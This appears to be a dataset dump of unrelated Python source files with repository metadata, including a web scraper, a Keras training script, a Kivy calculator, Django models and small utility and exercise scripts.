                wordFuncLabel = entryCols[3].text.strip()
                wordEtymology = entryCols[4].text.strip()
                wordDefinition = entryCols[5].text.strip()
                if entryCols[6].text.strip() != "":
                    cfile.append(APP_LIST_ERROR_FILE, "Unexpected Value:{}:{}".format(6, entryCols[6].text.strip()))
                    continue
                wordEntry = "#!Source: " + APP_SOURCE_DESC
                wordEntry = wordEntry + APP_NEWLINE + "#!Word: " + listWord
                wordEntry = wordEntry + APP_NEWLINE + "#!Respelling: " + wordRespelling
                wordEntry = wordEntry + APP_NEWLINE + "#!AudioURL: " + wordAudioURL
                wordEntry = wordEntry + APP_NEWLINE + "#!Etymology: " + wordEtymology
                wordEntry = wordEntry + APP_NEWLINE + "#!Sentence: " + wordSentence
                wordEntry = wordEntry + APP_NEWLINE + "#!Note: " + wordNote
                wordEntry = wordEntry + APP_NEWLINE + "#!Meta: " + wordMeta
                wordEntry = wordEntry + APP_NEWLINE + "#!Examples: " + wordExamples
                wordEntry = wordEntry + APP_NEWLINE + "#!Related: " + wordRelated
                wordEntry = wordEntry + APP_NEWLINE + "({}) {}".format(wordFuncLabel, wordDefinition)
                print("\nEntry for {}: ".format(displayWord))
                print(wordEntry)
                print(APP_EMPTY_STRING)
                APP_DICT_ENTR_FILE = APP_DICT_DIR + cfile.cleanse_filename(APP_DICT_ENTR.format(WORD=listWord))
                if os.path.isfile(APP_DICT_ENTR_FILE) and os.path.getsize(APP_DICT_ENTR_FILE) > 100:
                    print("Definition file {} exists. Skipping.".format(APP_DICT_ENTR_FILE))
                else:
                    print("Creating definition file: " + APP_DICT_ENTR_FILE)
                    cfile.write(APP_DICT_ENTR_FILE, wordEntry)
                APP_DICT_CLIP_FILE = APP_DICT_DIR + cfile.cleanse_filename(APP_DICT_CLIP.format(WORD=listWord))
                if os.path.isfile(APP_DICT_CLIP_FILE) and os.path.getsize(APP_DICT_CLIP_FILE) > 100:
                    print("Pronunciation file {} exists. Skipping.".format(APP_DICT_CLIP_FILE))
                else:
                    print("Creating pronunciation file: " + APP_DICT_CLIP_FILE)
                    cfile.download(connectionPool, wordAudioURL, APP_DICT_CLIP_FILE)
            print("\nAdding [{}] to word list file: {}".format(setWord, APP_LIST_FILE))
            cfile.append(APP_LIST_FILE, setWord)
            #userInput = cinput.get_keypress("\nPress any key to continue ... ")
            while True:
                nextButton = browser.find_element_by_id("nextButton")
                nextButton.click()
                print("Clicked Next button")
                time.sleep(APP_WAIT_DELAY)
                nextWordInfoElement = browser.find_element_by_xpath("//form[contains(@name,'moduleform')]")
                nextWordID = nextWordInfoElement.find_element_by_xpath("//*[contains(@id,'_id')]").get_property("value")
                if nextWordID == wordID:
                    coutput.print_err("Page not refreshed. Retrying in {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
                    time.sleep(APP_TIMEOUT_WAIT_DELAY)
                else:
                    break
        except Exception as e:
            exceptionName = type(e).__name__
            if exceptionName in ["UnexpectedAlertPresentException", "NoSuchElementException"]:
                coutput.print_warn("Last page of set reached. Moving to next set ...")
                break
            else:
                # Displays the trace for the error
                coutput.print_err(traceback.format_exc())
                #coutput.print_err("Exception: " + str(e))
                # Accept alert
                #time.sleep(1)
                #alert = browser.switch_to.alert
                #alert.accept()
                coutput.print_err("Unhandled exception [{}] occurred. Exiting ...".format(exceptionName))
                exit_app(1)

# Resume input and exit
coutput.print_warn("Processing complete. Exiting ...")
exit_app()
|
[
"dito.john@gmail.com"
] |
dito.john@gmail.com
|
fc3c9df607cda43fb98ed8193686c1c6698e35c0
|
a66b228ce00e02bdc4aca96549402bf56a91a44c
|
/building_footprint_segmentation/seg/base_factory.py
|
2714bf18a5a6f292ca87688f39373699015f6258
|
[
"Apache-2.0"
] |
permissive
|
fuzailpalnak/building-footprint-segmentation
|
87c5db956c268236a48a05df9335cbb95572bfc2
|
75f6d6b815efed34f4d7a685dbf616bab18f0f04
|
refs/heads/main
| 2023-09-01T11:40:48.886802
| 2023-08-29T12:35:49
| 2023-08-29T12:35:49
| 308,795,139
| 86
| 29
|
MIT
| 2022-10-25T15:08:48
| 2020-10-31T03:23:25
|
Python
|
UTF-8
|
Python
| false
| false
| 555
|
py
|
from typing import List

class Factory:
    def __init__(self):
        pass

    def create_loader(
        self,
        root_folder,
        image_normalization,
        label_normalization,
        augmenters,
        batch_size,
    ):
        raise NotImplementedError

    def create_network(self, name, **kwargs):
        raise NotImplementedError

    def create_criterion(self, name, **kwargs):
        raise NotImplementedError

    def create_metrics(self, data_metrics: List[str]):
        raise NotImplementedError
|
[
"fuzailpalnak@gmail.com"
] |
fuzailpalnak@gmail.com
|
096a1ae7e9f43c211066e65e3cb3d994e8e1bfb2
|
73e8fdb4db1180085703b0cf827cfa00ce4b3d0d
|
/cleanup_script/fixit.py
|
9d3c6423ddaaede734cfacb16642657f24346795
|
[] |
no_license
|
fredrikbondesson/fredrikbondesson.github.io
|
228a79c4b5c57ceaa71f88e8602b78ffbf15d47f
|
6bbb3f93a792b76488c583069b8c9f54aa31d390
|
refs/heads/master
| 2023-08-18T18:55:32.366470
| 2023-08-12T12:12:17
| 2023-08-12T12:12:17
| 168,958,719
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
# Python 2 script (print statements).
import sys

def fix_none_in_file(file_name):
    with open(file_name) as file:  # Use file to refer to the file object
        data = file.readline()
        prev_value = None
        buffer = data.rstrip("\n\r")
        while data:
            csv_parts = data.split(',')
            if 'None' in data:
                if prev_value != None and prev_value != 'None':
                    buffer = buffer.replace('None', prev_value)
            if csv_parts[1] != None and csv_parts[1] != 'None':
                prev_value = csv_parts[1]
            data = file.readline()
            print buffer
            buffer = data.rstrip("\n\r")

def fix_missing_column_in_file(file_name):
    with open(file_name) as file:  # Use file to refer to the file object
        data = file.readline()
        prev_value = None
        buffer = data.rstrip("\n\r")
        while data:
            csv_parts = buffer.split(',')
            if len(csv_parts) != 3:
                csv_parts.insert(1, prev_value)
                buffer = ','.join(csv_parts)
            else:
                prev_value = csv_parts[1]
            data = file.readline()
            print buffer
            buffer = data.rstrip("\n\r")

def check_order(file_name):
    #2016-02-02 19:13:25,37.64,1.72,0.00
    # 2016-02-02 19:13:25
    #date_time_str = '2018-06-29 08:15:27.243860'
    #date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S.%f')
    #print('Date:', date_time_obj.date())
    #print('Time:', date_time_obj.time())
    import datetime
    prev_value = None
    with open(file_name) as file:  # Use file to refer to the file object
        data = file.readline()
        data = file.readline()
        while data:
            csv_parts = data.split(',')
            # if timestamp like 2016-02-02 19:13:25
            date_time_obj = datetime.datetime.strptime(csv_parts[0], '%Y-%m-%d %H:%M:%S')
            # if timestamp like 2017-06-08 22:10
            #date_time_obj = datetime.datetime.strptime(csv_parts[0], '%Y-%m-%d %H:%M')
            if prev_value != None and date_time_obj < prev_value:
                print "data=" + str(date_time_obj)
                print "prev_value=" + str(prev_value)
            prev_value = date_time_obj
            data = file.readline()

def main():
    if len(sys.argv) >= 2:
        file_name = sys.argv[1]
        #fix_none_in_file(file_name)
        # Note that nr of columns might need to be adjusted
        #fix_missing_column_in_file(file_name)
        check_order(file_name)

if __name__ == "__main__":
    main()
|
[
"fredrik.bondesson@gmail.com"
] |
fredrik.bondesson@gmail.com
|
8c9102f127fc0c01936651ac0ed5c50619655c02
|
b05797c5bc986e15948d82da2faf6ac1eeb1443d
|
/train_model_v16_3.py
|
cd0b6b862265bd92b40994d48e12cac8d6916b76
|
[
"MIT"
] |
permissive
|
vietnamican/Deep-Image-Matting
|
9b917a789f9322727cc1202b0d8766ae89df4b4d
|
436487e680027f07387700fb8ee1486635b82335
|
refs/heads/master
| 2022-06-18T11:09:28.589312
| 2020-05-08T16:05:32
| 2020-05-08T16:05:32
| 258,257,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,473
|
py
|
import argparse
import os

import tensorflow.keras as keras
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard
from tensorflow.keras.utils import multi_gpu_model

from config import patience, batch_size, epochs, num_train_samples, num_valid_samples
from data_generator_2 import train_gen, valid_gen
from migrate_v16 import migrate_model, migrate_model_2
from model_v16 import build_encoder_decoder, build_refinement
from utils import overall_loss, get_available_cpus, get_available_gpus, get_initial_epoch

log_dir = './logs_16_5'
checkpoint_models_path = './checkpoints_16_5/cp-{epoch:04d}-{loss:.4f}-{val_loss:.4f}.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_models_path)

if __name__ == '__main__':
    # Parse arguments
    ap = argparse.ArgumentParser()
    ap.add_argument("-p", "--pretrained", help="path to save pretrained model files")
    args = vars(ap.parse_args())
    pretrained_path = args["pretrained"]

    # Callbacks
    tensor_board = TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=True)
    # model_names = checkpoint_models_path + 'final.{epoch:02d}-{val_loss:.4f}.hdf5'
    model_checkpoint = ModelCheckpoint(filepath=checkpoint_models_path, monitor='val_loss', verbose=1, save_weights_only=True)
    early_stop = EarlyStopping('val_loss', patience=patience)
    reduce_lr = ReduceLROnPlateau('val_loss', factor=0.1, patience=int(patience / 4), verbose=1)

    class MyCbk(keras.callbacks.Callback):
        def __init__(self, model):
            keras.callbacks.Callback.__init__(self)
            self.model_to_save = model

        def on_epoch_end(self, epoch, logs=None):
            fmt = checkpoint_models_path + 'final.%02d-%.4f.hdf5'
            self.model_to_save.save(fmt % (epoch, logs['val_loss']))

    # Load our model, added support for Multi-GPUs
    num_gpu = len(get_available_gpus())
    if num_gpu >= 2:
        with tf.device("/cpu:0"):
            model = build_encoder_decoder()
            model = build_refinement(model)
            # if pretrained_path is not None:
            #     model.load_weights(pretrained_path)
        final = multi_gpu_model(model, gpus=num_gpu)
        # rewrite the callback: saving through the original model and not the multi-gpu model.
        model_checkpoint = MyCbk(model)
    else:
        model = build_encoder_decoder()
        final = build_refinement(model)
        # if pretrained_path is not None:
        #     final.load_weights(pretrained_path)

    if len(os.listdir(checkpoint_dir)) > 0:
        latest = tf.train.latest_checkpoint(checkpoint_dir)
        final.load_weights(latest)
        initial_epoch = get_initial_epoch(latest)
    else:
        migrate_model_2(final)
        initial_epoch = 0

    final.compile(optimizer='nadam', loss=overall_loss)
    print(final.summary())
    # keras.utils.plot_model(final, "model_modified.png")

    # Final callbacks
    callbacks = [tensor_board, model_checkpoint, early_stop, reduce_lr]

    # Start Fine-tuning
    final.fit(train_gen(),
              batch_size=4,
              validation_data=valid_gen(),
              epochs=epochs,
              verbose=1,
              callbacks=callbacks,
              initial_epoch=initial_epoch,
              use_multiprocessing=True,
              workers=2
              )
|
[
"vietnamican@gmail.com"
] |
vietnamican@gmail.com
|
407e7c198902553c262116841cbf7fd224dc9674
|
2b270ab8e9f948ed2076c4eeff3b072d2b7d9bef
|
/TESTS/shmem_new_test.py
|
3d3c99e8455478e688288f12f5c5a79d70a7503f
|
[] |
no_license
|
davidells/pyshmobj
|
416f8c64700422ee2d8a3edbf6dc42b34c9c48a0
|
4f8902fbff61078f754c75feae75de4b21d9deda
|
refs/heads/master
| 2021-01-13T01:49:38.799951
| 2012-04-23T02:38:31
| 2012-04-23T02:38:31
| 4,108,991
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,011
|
py
|
#!/usr/bin/env python
# Python 2 script (print statements).
import shmobj, os, sys, time

def printCurrentMemUse():
    print ''
    print '========================='
    print "Current free mem :", shmobj.freecount()
    print '========================='
    print ''

def runtest(testnum):
    if testnum == 1:
        l = []
        printCurrentMemUse()
        for i in range(2046):
            l.append(shmobj.SHMINT(i))
        print 'Allocated 2046 SHMINTs'
        printCurrentMemUse()
        shmobj.add_shmem_pages(8)
        print 'Added 8 more pages of shared mem'
        printCurrentMemUse()
        for i in range(2047):
            l.append(shmobj.SHMDBL(i))
        print 'Allocated 2047 SHMDBLs'
        printCurrentMemUse()
        for x in l:
            x.delete()
        print 'Deleted all shmobjs...'
        printCurrentMemUse()
        #print l

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print 'usage %s [test number]' % sys.argv[0]
        sys.exit(-1)
    runtest(int(sys.argv[1]))
|
[
"ells.david@gmail.com"
] |
ells.david@gmail.com
|
43a9c24f0e542a20ef237e8d72c4e66202f8ec62
|
e73b1ee518c217354927299811ede72e8a7830f8
|
/tuneInPodcastScrape.py
|
4f4b82b6215f6e7ff5e3ee8c339e81953ec246e0
|
[] |
no_license
|
fnets/FindBestRssFeed
|
4c67f92e7ee062ec33be2ffae989867f12b25852
|
ecd1d2723c02f483e23780bca707306ce6cb87c4
|
refs/heads/master
| 2021-01-15T15:27:17.200203
| 2016-08-29T22:49:53
| 2016-08-29T22:49:53
| 64,054,732
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,890
|
py
|
# Python 2 script (print statements, xrange, unicode).
import sys
from selenium import webdriver
from bs4 import BeautifulSoup
import re

#Pre: None, but eventually a string that indicates which podcatcher URL to search
#Post: Tuple that contains podcast names and their respective categories
def tuneinPodcastScrape(inScraperID):
    #Searches through base URL for podcast names and categories;
    #currently only works for Stitcher's site.
    catDict = { #change these to category URLs
        'Comedy': 18,
        'Business': 14,
        'News & Politics': 41,
        'Society & Culture': 13,
        'Education': 27,
        'Entertainment': 52,
        'Games & Hobbies': 30,
        'Lifestyle & Health': 11,
        'Music & Commentary': 39,
        'Kids & Family': 55,
        'Science & Medicine': 48,
        'Religion & Spirituality': 47,
        'Sports': 49,
        'Technology': 48,
        'International': 41,
        'Storytelling': 13,
        'Pop Culture, TV & Film': 52,
    }
    base_url = u'http://tunein.com/radio/'
    home = u'Podcasts-c100000088/'
    html_source = scrapeSource(base_url + home)
    soup = BeautifulSoup(html_source, "html.parser") #allows for parsing and searching of HTML of page
    names = []
    categories = []
    category_link_table = []
    column_table = soup.find_all('ul', {'class': "column"}) #pulls the category list out of the HTML
    for x in xrange(len(column_table)):
        category_link_table.append(column_table[x].find_all('a', {'class': "overlay-hover-trigger"})) #pulls the category links out of the HTML
    category_links = []
    for entry in category_link_table:
        entry_contents = entry[0].get('href') #goes through all 'a' tags and pulls the values for href (the URL suffixes)
        needed_entry_contents = re.match(r'(\/radio\/)(.*)', entry_contents) #groups the redundant '/radio/' and unique part of URL suffix
        category_links.append(needed_entry_contents.group(2)) #saves the unique portion of the category URL suffixes
    print category_links
    names = []
    for x in xrange(len(category_links)):
        html_source = scrapeSource(base_url + category_links[x])
        soup = BeautifulSoup(html_source, "html.parser")
        show_table = soup.find_all('h3', {'class': "title"})
        for x in xrange(len(show_table)):
            names.append(show_table[x].get_text())
    print names
    '''for x in xrange(len(category_link_table)):
    print 'link: ' + category_link_table.contents[0]
    #searches through link tags and pulls the URL suffixes needed
    for entry in category_link_table:
    entry_contents = entry.get('href') #goes through all 'a' tags and pulls the values for href (the URL suffixes)
    needed_entry_contents = re.match(r'(\/stitcher\-list\/)(.*)', entry_contents) #groups the redundant '/stitcher-list/' and unique part of URL suffix
    category_links.append(needed_entry_contents.group(2)) #saves the unique portion of the category URL suffixes
    blah = 1
    #z = codecs.open('podcast_names-2.txt', 'w', 'utf-8')
    #Cycles through each category, and pulls the podcast names and categories
    for x in xrange(len(category_links)):
    #if blah > 1:
    # break
    blah += 1
    html_source = scrapeSource(base_url+category_links[x])
    soup = BeautifulSoup(html_source, "html.parser") #allows for parsing and searching of HTML of page
    podcast_table = soup.findAll("span", {"class": "sl-showName"}) #All podcast names are stored with this class name in a dynamically created table
    category_table = soup.findAll("span", {"class": "sl-category"}) #All categories for podcasts found in previous line are stored with this class name in a dynamically created table
    for p in podcast_table:
    names.append(unicode(p.find('a').contents[0])) #pulls podcast names from link contents
    for p in category_table:
    if catDict[p.contents[0]] != 0: #does not include family and children podcasts
    categories.append(unicode(catDict[p.contents[0]])) #pulls category names from link contents
    podcasts = zip(names, categories) #creates a list of tuples where each entry is (name, category)
    json.dump(podcasts, codecs.open('podcasts-stitcher.json', 'w', 'utf-8') )
    '''
    exit(0)
    assert (type(podcasts[1]) is tuple), "getPodcastNames: List is not tuples"
    assert (podcasts), "getPodcastNames: List is empty"
    return podcasts #After demo, return to categories returned, too

def scrapeSource(url):
    browser = webdriver.Chrome()
    browser.get(url) #opens a Chrome browser to withdraw data
    html_source = browser.page_source #Maybe could be done with regex or etree, but this is much more elegant
    browser.close()
    return html_source

if __name__ == '__main__':
    tuneinPodcastScrape(sys.argv[1])
|
[
"kingoftherobots@gmail.com"
] |
kingoftherobots@gmail.com
|
c09f52280dc41c5f39ce9079c87c23b2bf529992
|
d08acb5acc5e1bb6b5ea9cdaa496a78fc155abf5
|
/main.py
|
2b8f0a89deecbf5022ad8eb2a3bf38d5e8f7689b
|
[] |
no_license
|
SushilCodes/myproject
|
f0d1165ac4341817e25b24d01ad23d945de57acf
|
819671266bb3e5107f6faf4845f2aea537ee7e8c
|
refs/heads/main
| 2023-08-31T16:15:06.214825
| 2021-10-07T08:15:23
| 2021-10-07T08:15:23
| 414,515,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,422
|
py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.textinput import TextInput

class MainApp(App):
    def build(self):
        self.operators = ["/", "*", "+", "-"]
        self.last_was_operator = None
        self.last_button = None
        main_layout = BoxLayout(orientation="vertical")
        self.solution = TextInput(
            multiline=False, readonly=True, halign="right", font_size=60
        )
        main_layout.add_widget(self.solution)
        buttons = [
            ["7", "8", "9", "/"],
            ["4", "5", "6", "*"],
            ["1", "2", "3", "-"],
            [".", "0", "C", "+"],
        ]
        for row in buttons:
            h_layout = BoxLayout()
            for label in row:
                button = Button(
                    text=label,
                    pos_hint={"center_x": 0.5, "center_y": 0.5},
                )
                button.bind(on_press=self.on_button_press)
                h_layout.add_widget(button)
            main_layout.add_widget(h_layout)
        equals_button = Button(
            text="=", pos_hint={"center_x": 0.5, "center_y": 0.9}
        )
        equals_button.bind(on_press=self.on_solution)
        main_layout.add_widget(equals_button)
        return main_layout

    def on_button_press(self, instance):
        current = self.solution.text
        button_text = instance.text
        if button_text == "C":
            # Clear the solution widget
            self.solution.text = ""
        else:
            if current and (
                    self.last_was_operator and button_text in self.operators):
                # Don't add two operators right after each other
                return
            elif current == "" and button_text in self.operators:
                # First character cannot be an operator
                return
            else:
                new_text = current + button_text
                self.solution.text = new_text
            self.last_button = button_text
            self.last_was_operator = self.last_button in self.operators

    def on_solution(self, instance):
        text = self.solution.text
        if text:
            solution = str(eval(self.solution.text))
            self.solution.text = solution

if __name__ == "__main__":
    app = MainApp()
    app.run()
|
[
"noreply@github.com"
] |
SushilCodes.noreply@github.com
|
43483376de2352910d6792c67cb5d3fb53919eaa
|
300088546b9fcb8d93ee5c648be8409eb0ea662e
|
/myapp/models.py
|
8380ca0ff65cf2ec9112f08bc87696dab4c8fd44
|
[] |
no_license
|
IshjotSingh97/Interviewbit-Academy-Assignment
|
6a750bad31917cb5fbcd9b90692bdf5fb2e1576c
|
ae1894f45961563e55a78d7c00fd5d6ee23eb0c0
|
refs/heads/main
| 2023-01-06T21:25:47.424504
| 2020-11-12T22:01:27
| 2020-11-12T22:01:27
| 311,994,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
from django.db import models

# Create your models here.
class Participant(models.Model):
    useremail = models.CharField(max_length=30)

class Interview(models.Model):
    title = models.CharField(max_length=30)
    date = models.DateField()
    starttime = models.TimeField()
    endtime = models.TimeField()

class Schedule(models.Model):
    participant = models.ForeignKey(Participant, on_delete=models.CASCADE)
    interview = models.ForeignKey(Interview, on_delete=models.CASCADE)
|
[
"ishjotsinghahluwalia@gmail.com"
] |
ishjotsinghahluwalia@gmail.com
|
de907d3883cd7669c470ba438fea450e34ac4aa2
|
d31b951902843af0a719fe291c70ec3a5741a96b
|
/Week4/exercise7_4.py
|
9a37c09478c9b80f94da99bcd9397dbcac19367e
|
[] |
no_license
|
bhamburg/CIS_626
|
ff3298dabb46fc13bb0fbad831c8b3a6f2644208
|
b4d84a664a2228d07036c3d119fa94cd894bb241
|
refs/heads/master
| 2020-03-29T20:07:01.143791
| 2014-03-06T01:36:29
| 2014-03-06T01:36:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
# The Fan class
# Author: Brian Hamburg

SLOW = 1
MEDIUM = 2
FAST = 3

class Fan:
    def __init__(self, speed=SLOW, radius=5, color="blue", on=False):
        self.__speed = speed
        self.__radius = radius
        self.__color = color
        self.__on = on

    def getSpeed(self):
        return self.__speed

    def getRadius(self):
        return self.__radius

    def getColor(self):
        return self.__color

    def isOn(self):
        return self.__on

    def setSpeed(self, speed):
        self.__speed = speed

    def setRadius(self, radius):
        self.__radius = radius

    def setColor(self, color):
        self.__color = color

    def setOn(self, on):
        self.__on = on

def displayProperties(fan):
    print("speed", fan.getSpeed(), "\n", "color", fan.getColor(), "\n",
          "radius", fan.getRadius(), "\n", "fan is on" if fan.isOn() else "fan is off")

def main():
    fan1 = Fan()
    fan1.setSpeed(FAST)
    fan1.setRadius(10)
    fan1.setColor("yellow")
    fan1.setOn(True)
    displayProperties(fan1)
    fan2 = Fan()
    fan2.setSpeed(MEDIUM)
    fan2.setRadius(5)
    fan2.setColor("blue")
    fan2.setOn(False)
    displayProperties(fan2)

main()
|
[
"bhamburg@gmail.com"
] |
bhamburg@gmail.com
|
550046117483a93251737487cfe4c6fc3d6ec916
|
b13a326c8aac68f72c71169187a4aa8d4fe1438f
|
/sim2real/info_masker.py
|
ef54bc6e378d78675bb9531fc2bf42bfd17b16f3
|
[] |
no_license
|
zy10zm/Pulsar
|
9f1d9abdf90d94e80c6dba2a02630bfe4b4e2115
|
714ee2d78577e59077af7c0f890e639879490eb8
|
refs/heads/master
| 2023-02-22T20:26:42.995175
| 2021-01-23T04:35:38
| 2021-01-23T04:35:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,996
|
py
|
import numpy as np
import sys
from copy import deepcopy

from architecture.entity_encoder.entity_formatter import Entity_formatter

class InfoMasker:
    def __init__(self, n_agents, mjco_ts, n_substeps):
        self.n_agents = n_agents
        self.mjco_ts = mjco_ts
        self.n_substeps = n_substeps
        self.entity_formatter = Entity_formatter()
        # Frequency parameters
        self.my_qpos_freq = 0.005
        self.my_qvel_freq = 0.005
        self.local_qvel_freq = 0.005
        self.teammate_info_freq = 0.020
        self.opponent_info_freq = 0.060
        self.rrsystem_info_freq = 0.050
        self.my_qpos_std = 0.0001
        self.my_qvel_std = 0.0001
        self.local_qvel_std = 0.0001
        self.teammate_info_std = 0.001
        self.opponent_info_std = 0.001
        self.rrsystem_info_std = 0.0001

    def generate_info_trajectory(self, t_per_eval, t_per_eval_std):
        # Create sampling timesteps
        info_sample_ts = [self.secs_to_steps(np.random.normal(t_per_eval, t_per_eval_std))]
        max_sample_ts = 0
        while max_sample_ts < self.secs_to_steps(3 * 60):
            info_sample_ts.append(
                self.secs_to_steps(np.random.normal(t_per_eval, t_per_eval_std)) + info_sample_ts[-1]
            )
            max_sample_ts = max(max_sample_ts, info_sample_ts[-1])
        return info_sample_ts

    def reset_masker(self):
        # Trajectories for obs
        self.obs_trajectory = [{
            "my_qpos": [self.generate_info_trajectory(self.my_qpos_freq, self.my_qpos_std), 0],
            "my_qvel": [self.generate_info_trajectory(self.my_qvel_freq, self.my_qvel_std), 0],
            "local_qvel": [self.generate_info_trajectory(self.local_qvel_freq, self.local_qvel_std), 0],
            "teammate_qpos": [self.generate_info_trajectory(self.teammate_info_freq, self.teammate_info_std), 0],
            "opponent1_qpos": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
            "opponent2_qpos": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
            "my_hp": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "teammate_hp": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "opponent1_hp": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
            "opponent2_hp": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
            "my_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "teammate_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.teammate_info_std), 0],
            "opponent1_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "opponent2_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "my_armors": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
            "teammate_armors": [self.generate_info_trajectory(self.rrsystem_info_freq, self.teammate_info_std), 0]
        } for _ in range(self.n_agents)]
        for ai in range(self.n_agents):
            hp_deduct_traj = [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0]
            self.obs_trajectory[ai]["my_hp_deduct"] = deepcopy(hp_deduct_traj)
            self.obs_trajectory[ai]["my_hp_deduct_res"] = deepcopy(hp_deduct_traj)
            zone_traj = [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0]
            self.obs_trajectory[ai]["zone_1"] = deepcopy(zone_traj)
            self.obs_trajectory[ai]["zone_2"] = deepcopy(zone_traj)
            self.obs_trajectory[ai]["zone_3"] = deepcopy(zone_traj)
            self.obs_trajectory[ai]["zone_4"] = deepcopy(zone_traj)
            self.obs_trajectory[ai]["zone_5"] = deepcopy(zone_traj)
            self.obs_trajectory[ai]["zone_6"] = deepcopy(zone_traj)
        # Obs for agents
        self.agent_obs = self.entity_formatter.get_empty_obs_with_shapes(1, self.n_agents)
        self.agent_obs_mask = [{k: 0 for k in self.agent_obs.keys()} for _ in range(self.n_agents)]
        self.buffered_agent_obs = deepcopy(self.agent_obs)

    def step(self, env_ts, entities):
        for ai in range(self.n_agents):
            for k in self.obs_trajectory[ai].keys():
                if env_ts == 0:
                    self.buffered_agent_obs[k][0, ai] = deepcopy(entities[ai][k])
                elif self.obs_trajectory[ai][k][1] < len(self.obs_trajectory[ai][k][0]) and self.obs_trajectory[ai][k][0][self.obs_trajectory[ai][k][1]] >= env_ts:
                    self.agent_obs[k][0, ai] = deepcopy(self.buffered_agent_obs[k][0, ai])
                    self.agent_obs_mask[ai][k] = 1
                    self.obs_trajectory[ai][k][1] += 1
                    self.buffered_agent_obs[k][0, ai] = deepcopy(entities[ai][k])

    def get_masked_entities(self, agent_no):
        masks_of_obs = deepcopy(self.agent_obs_mask[agent_no])
        masked_obs = dict()
        for k, observable in masks_of_obs.items():
            if observable:
                masked_obs[k] = self.agent_obs[k][:, agent_no:agent_no+1]
            else:
                masked_obs[k] = np.zeros(self.agent_obs[k][:, agent_no:agent_no+1].shape)
            self.agent_obs_mask[agent_no][k] = 0
        return masks_of_obs, masked_obs

    def secs_to_steps(self, secs):
        return int(secs / (self.mjco_ts * self.n_substeps))
|
[
"impeccableaslan@gmail.com"
] |
impeccableaslan@gmail.com
|
a4e3d0bc23d557c65a16e5cc90d7dcb4be6d8711
|
74ac9f8b3fd6fea863aebd1bc01aff3c23380bc5
|
/backend/src/loop_client.py
|
7ecd04bcb679421f30374ff5d2050e5961a26b4c
|
[
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
horietakehiro/NstPlaycloud
|
a4715c9465999f8e699b6047ebc9f0b3cb9fd783
|
56a8461c6bebc3b24850380e0a69e3df4f88a8ee
|
refs/heads/master
| 2022-12-27T02:29:40.117492
| 2020-10-09T10:37:21
| 2020-10-09T10:37:21
| 289,490,898
| 0
| 0
| null | 2020-10-05T13:07:18
| 2020-08-22T13:15:56
|
Python
|
UTF-8
|
Python
| false
| false
| 219
|
py
|
from transfer.client import transfer_client
import time

if __name__ == "__main__":
    # loop client's main function
    while True:
        resp = transfer_client.main()
        print(resp)
        time.sleep(10)
|
[
"nashhoward1312@docomo.ne.jp"
] |
nashhoward1312@docomo.ne.jp
|
c94bcc00ec7509cf898b0918d3f0549f5b6a1859
|
10bdc87263965b798b4db7f62a86ad2df1fcf756
|
/Valideaza.py
|
687e31961b37060c9fa79666b865b06af3e74492
|
[] |
no_license
|
Nechita-Andrei/evenimente
|
8a78b1269d4b88ae7a4e311cc8fcbaba01621a7d
|
a84fcfee2fdfb26d2f77c9116cc3cf35ab5494ba
|
refs/heads/master
| 2022-04-19T17:27:48.383038
| 2020-03-13T22:39:08
| 2020-03-13T22:39:08
| 247,172,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
'''
Created on 13 mar. 2020

@author: bogne
'''
from validare.ValidError import ValidError

class ValideazaPersoana(object):
    def valideazaPersoana(self, persoana):
        erori = ""
        if not len(persoana.get_id()) == 13:
            erori += "invalid id!\n"
        if persoana.get_nume() == "":
            erori += "invalid name!\n"
        if len(persoana.get_adresa()) <= 3:
            erori += "invalid address!\n"
        if len(erori) != 0:
            raise ValidError(erori)

class ValideazaEveniment(object):
    def valideazaEveniment(self, event):
        erori = ""
        if event.get_id() < 1:
            erori += "invalid id!\n"
        ok = False
        data = event.get_data().split("/")
        if len(data) == 3:
            if int(data[0]) > 0 and int(data[0]) < 32:
                if int(data[1]) > 0 and int(data[1]) < 13:
                    if int(data[2]) > 2017 and int(data[2]) < 2020:
                        ok = True
        if not ok:
            erori += "invalid date!\n"
        ora = event.get_timp().split(":")
        if int(ora[0]) < 0 or int(ora[0]) > 23 or int(ora[1]) < 0 or int(ora[1]) > 59:
            erori += "invalid time!\n"
        if len(event.get_descriere()) < 3:
            erori += "invalid description!\n"
